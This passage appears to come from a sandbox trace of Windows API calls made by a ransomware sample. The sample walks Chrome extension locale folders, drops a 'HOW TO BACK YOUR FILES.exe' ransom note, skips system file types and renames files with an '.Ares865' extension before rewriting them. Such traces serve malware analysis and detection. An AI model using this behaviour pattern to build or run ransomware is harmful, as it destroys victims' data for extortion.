hTemplateFile=0x0) returned 0x118 [0100.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0100.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" [0100.986] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" [0100.986] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.986] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.987] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.987] GetLastError () returned 0x0 [0100.988] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.988] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.988] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.988] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.988] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.988] lstrlenW (lpString="messages.json") returned 13 [0100.988] lstrlenW (lpString="Ares865") returned 7 [0100.988] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.988] lstrlenW (lpString=".dll") returned 4 [0100.988] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.988] lstrlenW (lpString=".lnk") returned 4 [0100.988] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.988] lstrlenW (lpString=".ini") returned 4 [0100.988] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.988] lstrlenW (lpString=".sys") returned 4 [0100.988] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.988] lstrlenW (lpString="messages.json") returned 13 [0100.989] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.Ares865") returned 160 [0100.989] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0100.994] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" [0100.994] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" [0100.994] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.994] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.994] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.995] GetLastError () returned 0x0 [0100.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.995] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.995] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.995] lstrlenW (lpString="messages.json") returned 13 [0100.995] lstrlenW (lpString="Ares865") returned 7 [0100.995] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.995] lstrlenW (lpString=".dll") returned 4 [0100.995] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.995] lstrlenW (lpString=".lnk") returned 4 [0100.995] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.995] lstrlenW (lpString=".ini") returned 4 [0100.995] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.995] lstrlenW (lpString=".sys") returned 4 [0100.996] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.996] lstrlenW (lpString="messages.json") returned 13 [0100.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.Ares865") returned 160 [0100.996] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.997] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=289) returned 1 [0101.000] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" [0101.000] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" [0101.000] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.000] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.001] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.001] GetLastError () returned 0x0 [0101.001] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.002] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.002] lstrlenW (lpString="messages.json") returned 13 [0101.002] lstrlenW (lpString="Ares865") returned 7 [0101.002] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.002] lstrlenW (lpString=".dll") returned 4 [0101.002] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.002] lstrlenW (lpString=".lnk") returned 4 [0101.002] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.002] lstrlenW (lpString=".ini") returned 4 [0101.002] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.002] lstrlenW (lpString=".sys") returned 4 [0101.002] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.002] lstrlenW (lpString="messages.json") returned 13 [0101.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.Ares865") returned 160 [0101.002] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.004] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=268) returned 1 [0101.007] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" [0101.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" [0101.007] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.007] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.008] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.008] GetLastError () returned 0x0 [0101.008] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.008] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.008] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.008] lstrcpyW (in: lpString1=0x2cce518, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.008] lstrlenW (lpString="messages.json") returned 13 [0101.008] lstrlenW (lpString="Ares865") returned 7 [0101.009] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.009] lstrlenW (lpString=".dll") returned 4 [0101.009] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.009] lstrlenW (lpString=".lnk") returned 4 [0101.009] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.009] lstrlenW (lpString=".ini") returned 4 [0101.009] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.009] lstrlenW (lpString=".sys") returned 4 [0101.009] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.009] lstrlenW (lpString="messages.json") returned 13 [0101.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.Ares865") returned 161 [0101.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234) returned 1 [0101.014] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" [0101.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" [0101.014] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.014] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.014] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.015] GetLastError () returned 0x0 [0101.015] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 